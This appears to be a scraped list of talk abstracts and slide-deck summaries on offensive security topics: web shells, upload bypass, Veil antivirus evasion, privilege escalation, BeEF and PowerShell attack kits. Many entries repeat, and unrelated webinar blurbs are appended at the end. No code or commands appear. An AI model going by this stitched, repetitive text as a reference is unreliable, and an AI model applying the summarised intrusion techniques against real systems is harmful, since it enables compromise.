TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
The document discusses various techniques for gaining remote access to websites through automated collection of remote file inclusion (RFI) vulnerabilities and web shells. It provides examples of PHP code that can be used to upload files, execute system commands, and create backdoors. It also lists sources for common web shells and techniques for obfuscating shell code, communicating stealthily, and restricting access to authorized users only. The document is an educational overview of RFI exploitation and automated web shell collection and management.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
Veil-Pillage is a post-exploitation framework that provides flexible options for triggering actions on target machines in a stealthy manner. It integrates functionality from Veil-Catapult and includes new modules for tasks like credential validation, user hunting, and privilege escalation. Veil-Pillage utilizes various techniques like Pass-the-Hash and in-memory Mimikatz to dump hashes and credentials without dropping files. It features a modular structure and logging/cleanup functions to support automation and leave target systems unchanged.
BH Arsenal '14 TurboTalk: The Veil-frameworkVeilFramework
The Veil Framework is a toolset that bridges pentesting and red team capabilities. Its flagship tool, Veil-Evasion, generates antivirus-evading executables. Veil-Catapult provides initial payload delivery. Veil-PowerView enables situational awareness using Powershell. Veil-Pillage is a post-exploitation framework that includes payload delivery, Powersploit module execution, and hashdumping techniques. The tools aggregate techniques to evade detection and operate across domains using trusts.
This document discusses how malware authors try to detect analysis environments like sandboxes, virtual machines, and debuggers in order to avoid analysis. It presents real world malware examples that use these detection techniques. The document then proposes potential "vaccination" techniques to emulate unhealthy environments in order to trick malware into thinking it is not being analyzed, making the researcher's job easier. It showcases some proof-of-concept tools developed by the author for this purpose, including tools to fake the presence of virtual machines and debuggers. Challenges with vaccination techniques are also discussed.
TakeDownCon Rocket City: WebShells by Adrian CrenshawEC-Council
The document discusses various techniques for gaining remote access to websites through automated collection of remote file inclusion (RFI) vulnerabilities and web shells. It provides examples of PHP code that can be used to upload files, execute system commands, and create backdoors. It also lists sources for common web shells and techniques for obfuscating shell code, communicating stealthily, and restricting access to authorized users only. The document is an educational overview of RFI exploitation and automated web shell collection and management.
Web-App Remote Code Execution Via Scripting Engines by Rahul Sasi at c0c0n - International Cyber Security and Policing Conference http://is-ra.org/c0c0n/speakers.html
This document discusses finding vulnerabilities in SWF (Flash) files. It begins with an introduction to embedding SWF files in HTML and ActionScript versions. It then covers strategies for finding SWF files on websites, as well as types of issues like XSS, data hijacking, and information disclosure. The document provides details on tools for automated and manual testing of SWF files, such as decompiling files, identifying input parameters and sinks, and techniques for bypassing protections.
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
Veil-Pillage is a post-exploitation framework that provides flexible options for triggering actions on target machines in a stealthy manner. It integrates functionality from Veil-Catapult and includes new modules for tasks like credential validation, user hunting, and privilege escalation. Veil-Pillage utilizes various techniques like Pass-the-Hash and in-memory Mimikatz to dump hashes and credentials without dropping files. It features a modular structure and logging/cleanup functions to support automation and leave target systems unchanged.
BH Arsenal '14 TurboTalk: The Veil-frameworkVeilFramework
The Veil Framework is a toolset that bridges pentesting and red team capabilities. Its flagship tool, Veil-Evasion, generates antivirus-evading executables. Veil-Catapult provides initial payload delivery. Veil-PowerView enables situational awareness using Powershell. Veil-Pillage is a post-exploitation framework that includes payload delivery, Powersploit module execution, and hashdumping techniques. The tools aggregate techniques to evade detection and operate across domains using trusts.
This document discusses how malware authors try to detect analysis environments like sandboxes, virtual machines, and debuggers in order to avoid analysis. It presents real world malware examples that use these detection techniques. The document then proposes potential "vaccination" techniques to emulate unhealthy environments in order to trick malware into thinking it is not being analyzed, making the researcher's job easier. It showcases some proof-of-concept tools developed by the author for this purpose, including tools to fake the presence of virtual machines and debuggers. Challenges with vaccination techniques are also discussed.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
When you don't have 0days: client-side exploitation for the massesMichele Orru
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
The purpose of this presentation is to explain the basic resources to understand how a programmer can create malware, insides about the theme, and brainstorms following practical codes and many exotic ideas for security mitigations for defense.
"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." ― Sun Tzu, The Art of War
This document provides an overview of the best tools for penetration testing web applications. It discusses Nikto for server enumeration and vulnerability scanning, Webscarab for intercepting requests and modifying parameters, w3af as an open source web application exploitation framework, and Firefox with extensions like Firebug and YSlow for manual testing. Commercial tools like Core Impact and Cenzic Hailstorm are also highlighted for their methodologies and capabilities. Additional resources like Samurai Linux are mentioned as a ready-to-go penetration testing environment with pre-installed web assessment tools.
In this presentation, you can learn many practical resources about WAF, how you can create your WAF, and how you can bypass protections in common WAFs.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A presentation covering some of the interesting things going on with Powershell in the Infosec community. I give a brief overview of what powershell is, then go over some interesting aspects of three different offensive powershell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
Major news in the month included unrest in Turkey and a coup in Thailand. Ebay was hacked and fake user databases were sold. The USA charged five Chinese nationals with cyber espionage. Memory issues caused failures in an air traffic control system. Interesting tools released included ones for bypassing two-factor authentication and exploiting ad networks. Heartbleed continued to be analyzed and disclosed vulnerabilities in certificate authorities.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
Getting root with benign app store apps vsecurityfestCsaba Fitzl
This document discusses macOS privilege escalation techniques using benign App Store apps. It describes how dylib hijacking can be used to gain root privileges by subverting the installation process and dropping files in privileged locations. It provides a demonstration using a "Crontab Creator" app to drop a cronjob that executes a script with root privileges. The document also discusses monitoring tools and how Apple addressed the vulnerability in later versions of macOS.
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. Its a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
Antonio Costa created the 0d1n tool to automate bruteforcing and fuzzing of web applications written in C for performance. The tool takes parameters like the target host, payload files, and custom request files to identify vulnerabilities like XSS. It can save responses and uses techniques like tampering to bypass defenses. The open source tool is still in beta but can find anomalies and vulnerabilities in parameters, files, directories and forms.
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
This document discusses kernel exploitation techniques. It begins by explaining the KernelIo technique for reading and writing kernel memory on Windows and Linux despite protections like SMAP and SMEP. It then discusses several vulnerability cases that can enable KernelIo like out of bounds writes, kmalloc overflows, and abusing KASLR. Next, it analyzes design flaws in kernels like linked lists, hidden pointers, and callback mechanisms. It evaluates the state of exploitation on modern systems and envisions future hardened operating system designs. It advocates moving to C++ for exploitation development rather than shellcoding and introduces a C++ exploitation framework. The document was presented by Peter Hlavaty of the Keen Team and encourages recruitment for vulnerability research.
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
This document discusses various security issues that can arise in source control systems. It describes buffer overflow attacks, where a program writes data past the end of a memory buffer. It also discusses citizen/casual programmers who may not follow proper security practices. Covert channels that can transfer data in violation of security policies are described. The document outlines controls and best practices around these issues like parameter checking, memory protection, and auditing and logging.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
When you don't have 0days: client-side exploitation for the massesMichele Orru
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
The purpose of this presentation is to explain the basic resources to understand how a programmer can create malware, insides about the theme, and brainstorms following practical codes and many exotic ideas for security mitigations for defense.
"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." ― Sun Tzu, The Art of War
This document provides an overview of the best tools for penetration testing web applications. It discusses Nikto for server enumeration and vulnerability scanning, Webscarab for intercepting requests and modifying parameters, w3af as an open source web application exploitation framework, and Firefox with extensions like Firebug and YSlow for manual testing. Commercial tools like Core Impact and Cenzic Hailstorm are also highlighted for their methodologies and capabilities. Additional resources like Samurai Linux are mentioned as a ready-to-go penetration testing environment with pre-installed web assessment tools.
In this presentation, you can learn many practical resources about WAF, how you can create your WAF, and how you can bypass protections in common WAFs.
This document provides techniques for escalating privileges on Windows systems. It begins with an overview of tricks that can grant escalated privileges to users or administrators. Specific techniques discussed include exploiting misconfigurations, using keyloggers, searching for credentials on systems, exploiting Group Policy Preferences files, unattended installation files, Windows Deployment Services, binary path modifications, service configuration issues, and registry permissions problems. The document then covers methods for escalating from an administrative user to SYSTEM level privileges like using Metasploit exploits, Sysinternals tools, binary replacement, and WMIC. It concludes with sections on achieving persistence and bypassing authentication.
A presentation covering some of the interesting things going on with Powershell in the Infosec community. I give a brief overview of what powershell is, then go over some interesting aspects of three different offensive powershell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
Major news in the month included unrest in Turkey and a coup in Thailand. Ebay was hacked and fake user databases were sold. The USA charged five Chinese nationals with cyber espionage. Memory issues caused failures in an air traffic control system. Interesting tools released included ones for bypassing two-factor authentication and exploiting ad networks. Heartbleed continued to be analyzed and disclosed vulnerabilities in certificate authorities.
The document discusses vulnerabilities in Flash applications. It begins by introducing Flash and explaining that while some claim it is outdated, it still poses security risks due to programming flaws. Several types of vulnerabilities are then outlined, including cross-site scripting, cross-domain policy misconfigurations, decompilation risks revealing sensitive data, and abuse of functions like getURL() that allow external code execution. Methods of exploiting these vulnerabilities are explained, along with mitigations like sanitizing inputs and using strict cross-domain policies. The document concludes by mentioning additional risks like camjacking through clickjacking.
Getting root with benign app store apps vsecurityfestCsaba Fitzl
This document discusses macOS privilege escalation techniques using benign App Store apps. It describes how dylib hijacking can be used to gain root privileges by subverting the installation process and dropping files in privileged locations. It provides a demonstration using a "Crontab Creator" app to drop a cronjob that executes a script with root privileges. The document also discusses monitoring tools and how Apple addressed the vulnerability in later versions of macOS.
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. Its a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Bart Leppens gave a presentation on the Browser Exploitation Framework (BeEF). He discussed BeEF's architecture, how it hooks browsers, its module and extension system, and live demonstrations of information gathering, exploitation, and using BeEF with Metasploit. He also covered topics like inter-protocol communication, exploiting protocols like ActiveFax, and porting BeEF bind shellcode to Linux. The talk provided an overview of BeEF's capabilities and real-world attack scenarios.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
Antonio Costa created the 0d1n tool to automate bruteforcing and fuzzing of web applications written in C for performance. The tool takes parameters like the target host, payload files, and custom request files to identify vulnerabilities like XSS. It can save responses and uses techniques like tampering to bypass defenses. The open source tool is still in beta but can find anomalies and vulnerabilities in parameters, files, directories and forms.
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
This document discusses kernel exploitation techniques. It begins by explaining the KernelIo technique for reading and writing kernel memory on Windows and Linux despite protections like SMAP and SMEP. It then discusses several vulnerability cases that can enable KernelIo like out of bounds writes, kmalloc overflows, and abusing KASLR. Next, it analyzes design flaws in kernels like linked lists, hidden pointers, and callback mechanisms. It evaluates the state of exploitation on modern systems and envisions future hardened operating system designs. It advocates moving to C++ for exploitation development rather than shellcoding and introduces a C++ exploitation framework. The document was presented by Peter Hlavaty of the Keen Team and encourages recruitment for vulnerability research.
Hacking Vulnerable Websites to Bypass FirewallsNetsparker
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
This document discusses various security issues that can arise in source control systems. It describes buffer overflow attacks, where a program writes data past the end of a memory buffer. It also discusses citizen/casual programmers who may not follow proper security practices. Covert channels that can transfer data in violation of security policies are described. The document outlines controls and best practices around these issues like parameter checking, memory protection, and auditing and logging.
PHP is the most commonly used server-side programming and deployed more than 80% in web server all over the world. However, PHP is a 'grown' language rather than deliberately engineered, making writing insecure PHP applications far too easy and common. If you want to use PHP securely, then you should be aware of all its pitfalls.
The Supporting Role of Antivirus Evasion while PersistingCTruncer
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
1. The document summarizes a presentation on web security given to the Seattle PHP Users Group. It discusses common web vulnerabilities like SQL injection, cross-site scripting, and insecure direct object references.
2. It provides tips for protecting websites such as implementing a web application firewall, securing file permissions, and using HTML5 features like Content Security Policy headers.
3. The presentation emphasizes that security is an ongoing process of monitoring for updates, testing with hacking tools, and seeking outside reviews of a site's security.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, including cross-site scripting (XSS) and SQL injection vulnerabilities. It describes how an attacker could use these vulnerabilities to upload malicious JavaScript that steals browser history, obtains file system and network information, and creates a hidden web shell to execute commands on the victim's system. The document recommends keeping software updated, using a restrictive browser configuration like Noscript, and dividing content into security zones to help protect against these types of attacks.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, including cross-site scripting (XSS) and SQL injection vulnerabilities. It describes how XSS could be used to upload malicious JavaScript files that execute commands on the victim's system through PhpMyAdmin without authentication. The attack involves uploading a script via XSS that requests commands, gets a PhpMyAdmin token, and uses SQL queries to create and delete a web shell file to run arbitrary commands on the local file system and network.
This document summarizes vulnerabilities found in popular local web development environments like XAMPP, and how they can be exploited to perform cross-site scripting (XSS) and SQL injection attacks. It describes how an attacker could use XSS to upload a JavaScript file, add it to the page head, and then execute commands by communicating with a control server over JSONP. The script would then use the vulnerabilities in phpMyAdmin to create a web shell file and delete itself, allowing the attacker to hard-code commands to steal system information from the victim.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in-place, the internals of the appliance hides interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
Ever Present Persistence - Established Footholds Seen in the WildCTruncer
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This document provides an introduction and glossary of key information technology terms. It defines what a glossary is and explains that computers are programmable through stored programs. It describes the main components of a computer's system unit including the processor, memory, and storage. It gives a high-level overview of how software is developed through a cycle of analysis, development and testing. It also discusses some common problems with software, different coding systems for mainframe and personal computers, popular programming and markup languages, and basics of domains, hosting, and transport protocols like HTTP and FTP.
Linux has become integral part of Embedded systems. This three part presentation gives deeper perspective of Linux from system programming perspective. Stating with basics of Linux it goes on till advanced aspects like thread and IPC programming.
Chapter 1: Introduction to Command Lineazzamhadeel89
The document provides an introduction to using the command line interface. It discusses why the command line is useful, especially for security practitioners. It then describes the basic commands and operations used in the command line, including navigating directories, listing files, redirection, piping, and running commands in the background. The document also discusses options for running Linux and the bash shell on Windows systems, such as using Git Bash, Cygwin, or the Windows Subsystem for Linux.
This document provides an overview of PHP (Hypertext Preprocessor), a widely-used open source scripting language especially suited for web development. It can be embedded into HTML and is executed on the server. PHP files contain text, HTML tags, and scripts enclosed in special PHP tags. An example PHP file is shown that outputs "Hello World". Reasons for using PHP include that it is open source, cross-platform, has free development tools, and supports many databases. PHP can be used for server-side scripting, command line scripting, and desktop applications. The installation procedure and basic PHP scripts, variables, operators, and functions are also outlined.
The document provides an overview of PHP and frameworks. It discusses open source software, widely used open source products like Linux, Apache, MySQL, and PHP. It covers the difference between open source and closed source software, pros and cons of open source, and background information on PHP including its history, variables, data types, conditional and looping statements, functions, arrays, and more. The document also discusses PHP frameworks, popular frameworks like WordPress, Magento and Opencart, and includes an index of topics covered.
Chapter 1: Introduction to Command Lineazzamhadeel89
The document provides an introduction to using the command line interface. It discusses why the command line is useful, especially for security practitioners. It outlines some options for running Linux and the bash shell on Windows systems, such as Git Bash and Cygwin. The document then covers various command line basics like commands, arguments, and redirection. It provides examples of commands like ls, cd, mkdir, and explains how to redirect input/output and pipe between commands. Finally, it discusses running commands in the background.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Red Hat Enterprise Linux provides strong security features that align with the defense in depth philosophy. These include hardening the operating system, applying security patches, using SELinux for mandatory access control, and implementing strong authentication methods. Proper authorization and profiling of users is also important to only grant necessary privileges.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfMalak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
For the full video of this presentation, please visit: https://www.edge-ai-vision.com/2024/06/building-and-scaling-ai-applications-with-the-nx-ai-manager-a-presentation-from-network-optix/
Robin van Emden, Senior Director of Data Science at Network Optix, presents the “Building and Scaling AI Applications with the Nx AI Manager,” tutorial at the May 2024 Embedded Vision Summit.
In this presentation, van Emden covers the basics of scaling edge AI solutions using the Nx tool kit. He emphasizes the process of developing AI models and deploying them globally. He also showcases the conversion of AI models and the creation of effective edge AI pipelines, with a focus on pre-processing, model conversion, selecting the appropriate inference engine for the target hardware and post-processing.
van Emden shows how Nx can simplify the developer’s life and facilitate a rapid transition from concept to production-ready applications.He provides valuable insights into developing scalable and efficient edge AI solutions, with a strong focus on practical implementation.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
